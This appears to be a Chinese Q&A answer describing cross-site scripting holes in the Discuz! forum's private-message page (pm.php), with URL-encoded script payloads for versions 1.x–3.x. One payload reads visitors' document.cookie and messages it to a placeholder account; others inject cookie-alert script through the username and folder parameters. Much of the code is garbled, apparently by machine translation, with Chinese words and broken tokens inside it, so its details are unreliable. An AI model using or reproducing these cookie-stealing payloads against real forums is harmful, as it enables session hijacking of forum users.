在discuz!帖子、回復、PM等的主題。不被篩選,所以您也可以添加代碼。比如/forum/pm.php?action=send%22,false);var % 20 forms = % 22 pmsubmit = Submit % 22 . tolowercase()% 2B % 22% 26 msgto = XXXXX % 26 subject = cookie % 26 save outbox = 0% 26 message = % 22% 2 be scape(documents . cookie);req . setrequestheader(% 22 content-length % 22,forms . length)% 3 breq . setrequestheader(% 22 content-TYPE % 22,% 22 application/x-www-form-urlencoded % 22)。Req.send(表單);找到了% 3c/script % 3e % 3cb % 22[/img]discuz!UT跨域站點的腳本漏洞——關於跨域站點的短信腳本漏洞是壹個非常常見的漏洞。具體信息請參考:/phpbbs/pm.php?動作=發送& ampUsername=name語句,但是名字不經過濾直接顯示在發送短信的頁面上,為竊取cookie或者更嚴重的破壞打開了方便之門。Discuz!3.x已經改成/pm.php了?動作=發送& amp像uid=XXXX這樣的語句避免了這個漏洞,但是在選擇SMS文件夾時不會被過濾。上面的漏洞示例/phpbbs/pm.php也是生成的?動作=s...d & ampUsername = name% 22% 3e% 3c腳本% 3e警報(文檔。cookie)% 3c/script % 3e % 3cb % 22[/URL],上面的例子是顯示自己的cookie。(為了Discuz!1.X Discuz!2.X) /pm.php?文件夾=收件箱% 22% 3e% 3...抄本% 3e % 3cb %顯示您的cookie。(為了Discuz!3.X) UT已經在主題上過濾了,也就是說%27轉換成了';但是它的收件人沒有經過過濾,所以也有類似的漏洞。例子略。(不同UT論壇代碼不同,但總體來說都有類似的漏洞。)
望采納